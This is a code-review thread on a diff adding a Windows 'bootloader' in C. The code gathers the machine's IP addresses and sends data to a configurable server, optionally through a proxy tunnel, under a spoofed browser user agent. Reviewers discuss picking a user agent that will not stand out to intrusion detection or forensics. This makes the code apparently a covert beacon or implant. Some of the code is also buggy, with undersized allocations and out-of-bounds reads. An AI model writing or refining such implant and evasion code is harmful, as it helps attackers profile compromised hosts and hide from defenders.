bootloader/src/old_machine_bootloader_windows.c

```diff
@@ -0,0 +1,330 @@
+
+    pAdapt = pAdapterInfo;
+
+    while (pAdapt && j < maxSize)
+    {
+        pAddrStr = &(pAdapt->IpAddressList);
+        while(pAddrStr && j < maxSize)
+        {
+            if(strcmp(pAddrStr->IpAddress.String, "0.0.0.0")){
+                printf("\tIP Address. . . . . . . . . : %s\n", pAddrStr->IpAddress.String);
+                IPs[j] = pAddrStr->IpAddress.String;
+                j += 1;
+            }
+            pAddrStr = pAddrStr->Next;
+        }
+
+        pAdapt = pAdapt->Next;
+    }
+    *addrCount = j;
+    return IPs;
+}
+
+char* concatenate(int size, char** array, const char* joint){
+    size_t jlen;
+    size_t* lens = malloc(size);
+    size_t i, total_size = (size-1) * (jlen=strlen(joint)) + 1;
+    char *result, *p;
+    for(i=0; i<size; ++i){
+        total_size += (lens[i]=strlen(array[i]));
+    }
+    p = result = malloc(total_size);
+    for(i=0;i<size;++i){
+        printf("%s\n", array[i]);
+        memcpy(p, array[i], lens[i]);
+        p += lens[i];
+        if(i<size-1){
+            memcpy(p, joint, jlen);
+            p += jlen;
+        }
+    }
+    *p = '\0';
+    return result;
+}
+
+// Replaces a single occurrence of substring
+wchar_t* replaceSubstringOnce(wchar_t* str, wchar_t* to_be_replaced, wchar_t* replacement) {
+    size_t str_size = wcslen(str);
+    size_t to_be_replaced_size = wcslen(to_be_replaced);
+    size_t replacement_size = wcslen(replacement);
+    size_t result_size = str_size - to_be_replaced_size + replacement_size;
+    wchar_t *result_string = (wchar_t*)malloc(sizeof(wchar_t) * (result_size));
+
+    for (int i = 0; i < (int)result_size; i++ ){
+        result_string[i] = str[i];
+        if(str[i] == to_be_replaced[0] && replacement_size != 0){
+            BOOL should_replace = TRUE;
+            // Check if started iterating over string that will be replaced
+            for (int j = i; j < (i + to_be_replaced_size); j++){
+                if(str[j] != to_be_replaced[j - i]) {
+                    should_replace = FALSE;
+                }
+            }
+            // If string that needs to be replaced is found - replace it
+            if (should_replace) {
+                for (int j = i; j < (i + replacement_size); j++){
+                    result_string[j] = replacement[j - i];
+                }
+                i += to_be_replaced_size;
+            }
+        }
+    }
+    result_string[result_size] = '\0';
+    return result_string;
+}
+
+int sendRequest(wchar_t* server, wchar_t* tunnel, BOOL tunnelUsed, wchar_t* reqData){
+    wchar_t _page[] = L"/windows";
+    HINTERNET hInternet, hConnect, hRequest;
+    wprintf(L"%ls : %ls : %ls\n", server, tunnel, reqData);
+    int finished = 0;
+    printf("1\n");
+    if (tunnelUsed){
+        hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_PROXY, tunnel, NULL, 0);
+    } else {
+        hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    }
```

Comment:
We're not using the same user agent string for both OSes, why?
And if specifying a user agent manually, why this?

Reply:
What do you think we should specify? It shouldn't be a bogus value because of IDS's/forensics, right?

Reply:
I think we should specify something a bit longer. Maybe we can take the python requests user agent string.